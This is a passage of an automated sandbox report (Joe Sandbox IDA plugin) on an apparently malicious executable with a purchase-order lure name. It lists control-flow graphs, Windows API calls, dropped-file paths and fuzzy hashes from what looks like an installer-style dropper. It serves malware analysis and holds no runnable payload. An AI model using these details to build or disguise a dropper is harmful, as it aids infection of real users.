                                                control_flow_graph 499 4059cc-4059f2 call 405c97 502 4059f4-405a06 DeleteFileW 499->502 503 405a0b-405a12 499->503 506 405b88-405b8c 502->506 504 405a14-405a16 503->504 505 405a25-405a35 call 4062ba 503->505 507 405b36-405b3b 504->507 508 405a1c-405a1f 504->508 512 405a44-405a45 call 405bdb 505->512 513 405a37-405a42 lstrcatW 505->513 507->506 511 405b3d-405b40 507->511 508->505 508->507 514 405b42-405b48 511->514 515 405b4a-405b52 call 4065fd 511->515 516 405a4a-405a4e 512->516 513->516 514->506 515->506 523 405b54-405b68 call 405b8f call 405984 515->523 519 405a50-405a58 516->519 520 405a5a-405a60 lstrcatW 516->520 519->520 522 405a65-405a81 lstrlenW FindFirstFileW 519->522 520->522 524 405a87-405a8f 522->524 525 405b2b-405b2f 522->525 539 405b80-405b83 call 405322 523->539 540 405b6a-405b6d 523->540 528 405a91-405a99 524->528 529 405aaf-405ac3 call 4062ba 524->529 525->507 527 405b31 525->527 527->507 533 405a9b-405aa3 528->533 534 405b0e-405b1e FindNextFileW 528->534 541 405ac5-405acd 529->541 542 405ada-405ae5 call 405984 529->542 533->529 538 405aa5-405aad 533->538 534->524 537 405b24-405b25 FindClose 534->537 537->525 538->529 538->534 539->506 540->514 543 405b6f-405b7e call 405322 call 406080 540->543 541->534 544 405acf-405ad8 call 4059cc 541->544 552 405b06-405b09 call 405322 542->552 553 405ae7-405aea 542->553 543->506 544->534 552->534 556 405aec-405afc call 405322 call 406080 553->556 557 405afe-405b04 553->557 556->534 557->534
                                                APIs
                                                • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 004059F5
                                                • lstrcatW.KERNEL32(brainpower\indbefattende.Cob,\*.*,brainpower\indbefattende.Cob,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A3D
                                                • lstrcatW.KERNEL32(?,0040A014,?,brainpower\indbefattende.Cob,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A60
                                                • lstrlenW.KERNEL32(?,?,0040A014,?,brainpower\indbefattende.Cob,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A66
                                                • FindFirstFileW.KERNELBASE(brainpower\indbefattende.Cob,?,?,?,0040A014,?,brainpower\indbefattende.Cob,?,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405A76
                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405B16
                                                • FindClose.KERNEL32(00000000), ref: 00405B25
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                • String ID: "C:\Users\user\Desktop\PO 0309494059506060609696007.exe"$C:\Users\user\AppData\Local\Temp\$\*.*$brainpower\indbefattende.Cob
                                                • API String ID: 2035342205-645187239
                                                • Opcode ID: 6f8429c6ad7802af8bfcde45fc15bbabab868814cabb64775f30c171cc2975e6
                                                • Instruction ID: 87b7c1c15068e6398432f2de95375e915c3ae258b511550e47b187391169d043
                                                • Opcode Fuzzy Hash: 6f8429c6ad7802af8bfcde45fc15bbabab868814cabb64775f30c171cc2975e6
                                                • Instruction Fuzzy Hash: EE41E430900914BACB21AB618C89ABF7778EF45768F50427FF801B11D1D77CA982DE6E
                                                APIs
                                                • FindFirstFileW.KERNELBASE(?,00430298,C:\,00405CE0,C:\,C:\,00000000,C:\,C:\,?,?,74DF3420,004059EC,?,C:\Users\user\AppData\Local\Temp\,74DF3420), ref: 00406608
                                                • FindClose.KERNEL32(00000000), ref: 00406614
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: Find$CloseFileFirst
                                                • String ID: C:\
                                                • API String ID: 2295610775-3404278061
                                                • Opcode ID: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                                • Instruction ID: 1ab566c2093321911261fd6ef708f8cedd572ce36bb67071c96f4f7979b88ecc
                                                • Opcode Fuzzy Hash: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
                                                • Instruction Fuzzy Hash: 3AD012315051205BC3401B386E0C85B7A599F55331B159F37F86AF51E0DB758C72869C
                                                APIs
                                                • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                Strings
                                                • C:\Users\user\AppData\Local\sillinesses\Foiningly, xrefs: 004021C3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: CreateInstance
                                                • String ID: C:\Users\user\AppData\Local\sillinesses\Foiningly
                                                • API String ID: 542301482-3300392592
                                                • Opcode ID: 85fa777544762f8280052d3ed6c1060dd403dfe718f2971fff495873814e0497
                                                • Instruction ID: 47658dbbd12ee8008517b47355d5d9d52026a5fb35fba2bce99957a22e6c3eef
                                                • Opcode Fuzzy Hash: 85fa777544762f8280052d3ed6c1060dd403dfe718f2971fff495873814e0497
                                                • Instruction Fuzzy Hash: 8B414C71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E0DBB99981CB44
                                                APIs
                                                • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 00402877
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: FileFindFirst
                                                • String ID:
                                                • API String ID: 1974802433-0
                                                • Opcode ID: 1d203f80b4415f0f6344281a2a9e2fd09f6dd1f95b509643d07a0f28621ba8c6
                                                • Instruction ID: 0cd4a400be5c1b2ce6ea5bbb35e8853c3f48bcc8ff45a2cab7902aaadd26400c
                                                • Opcode Fuzzy Hash: 1d203f80b4415f0f6344281a2a9e2fd09f6dd1f95b509643d07a0f28621ba8c6
                                                • Instruction Fuzzy Hash: C8F08271A14104EFDB00EBA4DA499ADB378EF04314F6045BBF515F21D1DBB45D409B29

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 190 403d58-403d6a 191 403d70-403d76 190->191 192 403eab-403eba 190->192 191->192 193 403d7c-403d85 191->193 194 403f09-403f1e 192->194 195 403ebc-403f04 GetDlgItem * 2 call 404231 SetClassLongW call 40140b 192->195 198 403d87-403d94 SetWindowPos 193->198 199 403d9a-403d9d 193->199 196 403f20-403f23 194->196 197 403f5e-403f63 call 40427d 194->197 195->194 201 403f25-403f30 call 401389 196->201 202 403f56-403f58 196->202 209 403f68-403f83 197->209 198->199 204 403db7-403dbd 199->204 205 403d9f-403db1 ShowWindow 199->205 201->202 223 403f32-403f51 SendMessageW 201->223 202->197 208 4041fe 202->208 210 403dd9-403ddc 204->210 211 403dbf-403dd4 DestroyWindow 204->211 205->204 218 404200-404207 208->218 216 403f85-403f87 call 40140b 209->216 217 403f8c-403f92 209->217 213 403dde-403dea SetWindowLongW 210->213 214 403def-403df5 210->214 219 4041db-4041e1 211->219 213->218 221 403e98-403ea6 call 404298 214->221 222 403dfb-403e0c GetDlgItem 214->222 216->217 226 403f98-403fa3 217->226 227 4041bc-4041d5 DestroyWindow EndDialog 217->227 219->208 225 4041e3-4041e9 219->225 221->218 228 403e2b-403e2e 222->228 229 403e0e-403e25 SendMessageW IsWindowEnabled 222->229 223->218 225->208 231 4041eb-4041f4 ShowWindow 225->231 226->227 232 403fa9-403ff6 call 4062dc call 404231 * 3 GetDlgItem 226->232 227->219 233 403e30-403e31 228->233 234 403e33-403e36 228->234 229->208 229->228 231->208 260 404000-40403c ShowWindow KiUserCallbackDispatcher call 404253 EnableWindow 232->260 261 403ff8-403ffd 232->261 238 403e61-403e66 call 40420a 233->238 239 403e44-403e49 234->239 240 403e38-403e3e 234->240 238->221 244 403e7f-403e92 SendMessageW 239->244 245 403e4b-403e51 239->245 243 403e40-403e42 240->243 240->244 243->238 244->221 248 403e53-403e59 call 40140b 245->248 249 403e68-403e71 call 40140b 245->249 258 403e5f 248->258 249->221 257 403e73-403e7d 249->257 257->258 258->238 264 404041 260->264 265 40403e-40403f 260->265 261->260 266 404043-404071 GetSystemMenu EnableMenuItem SendMessageW 264->266 265->266 267 404073-404084 SendMessageW 266->267 268 404086 266->268 269 40408c-4040cb call 404266 call 403d39 call 4062ba lstrlenW call 4062dc SetWindowTextW call 401389 267->269 268->269 269->209 280 4040d1-4040d3 269->280 280->209 281 4040d9-4040dd 280->281 282 4040fc-404110 DestroyWindow 281->282 283 4040df-4040e5 281->283 282->219 284 404116-404143 CreateDialogParamW 282->284 283->208 285 4040eb-4040f1 283->285 284->219 286 404149-4041a0 call 404231 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 284->286 285->209 287 4040f7 285->287 286->208 292 4041a2-4041b5 ShowWindow call 40427d 286->292 287->208 294 4041ba 292->294 294->219
                                                APIs
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D94
                                                • ShowWindow.USER32(?), ref: 00403DB1
                                                • DestroyWindow.USER32 ref: 00403DC5
                                                • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DE1
                                                • GetDlgItem.USER32(?,?), ref: 00403E02
                                                • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403E16
                                                • IsWindowEnabled.USER32(00000000), ref: 00403E1D
                                                • GetDlgItem.USER32(?,00000001), ref: 00403ECB
                                                • GetDlgItem.USER32(?,00000002), ref: 00403ED5
                                                • SetClassLongW.USER32(?,000000F2,?), ref: 00403EEF
                                                • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F40
                                                • GetDlgItem.USER32(?,00000003), ref: 00403FE6
                                                • ShowWindow.USER32(00000000,?), ref: 00404007
                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404019
                                                • EnableWindow.USER32(?,?), ref: 00404034
                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040404A
                                                • EnableMenuItem.USER32(00000000), ref: 00404051
                                                • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404069
                                                • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040407C
                                                • lstrlenW.KERNEL32(0042D248,?,0042D248,00000000), ref: 004040A6
                                                • SetWindowTextW.USER32(?,0042D248), ref: 004040BA
                                                • ShowWindow.USER32(?,0000000A), ref: 004041EE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                • String ID:
                                                • API String ID: 3282139019-0
                                                • Opcode ID: 4e1ce740f07a43519fb41d0d7b5d1e349f1f17bbd9a29dd5407096d0de0a7573
                                                • Instruction ID: e03fc219ec92158800d4d40d681534e4389e9639ccb8e5563fa4604b390d03ca
                                                • Opcode Fuzzy Hash: 4e1ce740f07a43519fb41d0d7b5d1e349f1f17bbd9a29dd5407096d0de0a7573
                                                • Instruction Fuzzy Hash: 29C1D171600300ABDB216F61ED89E2B3AB8FB95746F04053EF641B51F0CB799982DB6D

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 295 4039aa-4039c2 call 406694 298 4039c4-4039d4 call 406201 295->298 299 4039d6-403a0d call 406188 295->299 308 403a30-403a59 call 403c80 call 405c97 298->308 304 403a25-403a2b lstrcatW 299->304 305 403a0f-403a20 call 406188 299->305 304->308 305->304 313 403aeb-403af3 call 405c97 308->313 314 403a5f-403a64 308->314 320 403b01-403b26 LoadImageW 313->320 321 403af5-403afc call 4062dc 313->321 314->313 315 403a6a-403a84 call 406188 314->315 319 403a89-403a92 315->319 319->313 322 403a94-403a98 319->322 324 403ba7-403baf call 40140b 320->324 325 403b28-403b58 RegisterClassW 320->325 321->320 326 403aaa-403ab6 lstrlenW 322->326 327 403a9a-403aa7 call 405bbc 322->327 339 403bb1-403bb4 324->339 340 403bb9-403bc4 call 403c80 324->340 328 403c76 325->328 329 403b5e-403ba2 SystemParametersInfoW CreateWindowExW 325->329 333 403ab8-403ac6 lstrcmpiW 326->333 334 403ade-403ae6 call 405b8f call 4062ba 326->334 327->326 332 403c78-403c7f 328->332 329->324 333->334 338 403ac8-403ad2 GetFileAttributesW 333->338 334->313 343 403ad4-403ad6 338->343 344 403ad8-403ad9 call 405bdb 338->344 339->332 348 403bca-403be4 ShowWindow call 406624 340->348 349 403c4d-403c4e call 4053f5 340->349 343->334 343->344 344->334 356 403bf0-403c02 GetClassInfoW 348->356 357 403be6-403beb call 406624 348->357 352 403c53-403c55 349->352 354 403c57-403c5d 352->354 355 403c6f-403c71 call 40140b 352->355 354->339 358 403c63-403c6a call 40140b 354->358 355->328 361 403c04-403c14 GetClassInfoW RegisterClassW 356->361 362 403c1a-403c3d DialogBoxParamW call 40140b 356->362 357->356 358->339 361->362 366 403c42-403c4b call 4038fa 362->366 366->332
                                                APIs
                                                  • Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
                                                  • Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                                • lstrcatW.KERNEL32(1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\,74DF3420,"C:\Users\user\Desktop\PO 0309494059506060609696007.exe",00000000), ref: 00403A2B
                                                • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\sillinesses,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403AAB
                                                • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\sillinesses,1033,0042D248,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D248,00000000), ref: 00403ABE
                                                • GetFileAttributesW.KERNEL32(Call), ref: 00403AC9
                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\sillinesses), ref: 00403B12
                                                  • Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E
                                                • RegisterClassW.USER32(00433E80), ref: 00403B4F
                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B67
                                                • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B9C
                                                • ShowWindow.USER32(00000005,00000000), ref: 00403BD2
                                                • GetClassInfoW.USER32(00000000,RichEdit20W,00433E80), ref: 00403BFE
                                                • GetClassInfoW.USER32(00000000,RichEdit,00433E80), ref: 00403C0B
                                                • RegisterClassW.USER32(00433E80), ref: 00403C14
                                                • DialogBoxParamW.USER32(?,00000000,00403D58,00000000), ref: 00403C33
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: "C:\Users\user\Desktop\PO 0309494059506060609696007.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\sillinesses$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                • API String ID: 1975747703-4110287722
                                                • Opcode ID: a0d7be8ede4e338908bb78720733716086b8107ecf3100ada8eb56b35bb25137
                                                • Instruction ID: 9f2b94ab3f1de80a41c8f53b965b22801f2352f665cd6d3f8e6571e1d6c0b700
                                                • Opcode Fuzzy Hash: a0d7be8ede4e338908bb78720733716086b8107ecf3100ada8eb56b35bb25137
                                                • Instruction Fuzzy Hash: D861B9312407007ED720AF659D46E2B3A6CEB85B4AF40057FF945B51E2CBBD9941CB2D

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 369 402edd-402f2b GetTickCount GetModuleFileNameW call 405db0 372 402f37-402f65 call 4062ba call 405bdb call 4062ba GetFileSize 369->372 373 402f2d-402f32 369->373 381 403052-403060 call 402e79 372->381 382 402f6b 372->382 374 40310f-403113 373->374 388 403062-403065 381->388 389 4030b5-4030ba 381->389 384 402f70-402f87 382->384 386 402f89 384->386 387 402f8b-402f94 call 403331 384->387 386->387 394 402f9a-402fa1 387->394 395 4030bc-4030c4 call 402e79 387->395 392 403067-40307f call 403347 call 403331 388->392 393 403089-4030b3 GlobalAlloc call 403347 call 403116 388->393 389->374 392->389 416 403081-403087 392->416 393->389 420 4030c6-4030d7 393->420 398 402fa3-402fb7 call 405d6b 394->398 399 40301d-403021 394->399 395->389 407 40302b-403031 398->407 418 402fb9-402fc0 398->418 406 403023-40302a call 402e79 399->406 399->407 406->407 411 403040-40304a 407->411 412 403033-40303d call 406787 407->412 411->384 419 403050 411->419 412->411 416->389 416->393 418->407 422 402fc2-402fc9 418->422 419->381 423 4030d9 420->423 424 4030df-4030e4 420->424 422->407 425 402fcb-402fd2 422->425 423->424 426 4030e5-4030eb 424->426 425->407 427 402fd4-402fdb 425->427 426->426 428 4030ed-403108 SetFilePointer call 405d6b 426->428 427->407 430 402fdd-402ffd 427->430 431 40310d 428->431 430->389 432 403003-403007 430->432 431->374 433 403009-40300d 432->433 434 40300f-403017 432->434 433->419 433->434 434->407 435 403019-40301b 434->435 435->407
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00402EEE
                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PO 0309494059506060609696007.exe,00000400,?,00000006,00000008,0000000A), ref: 00402F0A
                                                  • Part of subcall function 00405DB0: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\PO 0309494059506060609696007.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
                                                  • Part of subcall function 00405DB0: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6
                                                • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO 0309494059506060609696007.exe,C:\Users\user\Desktop\PO 0309494059506060609696007.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
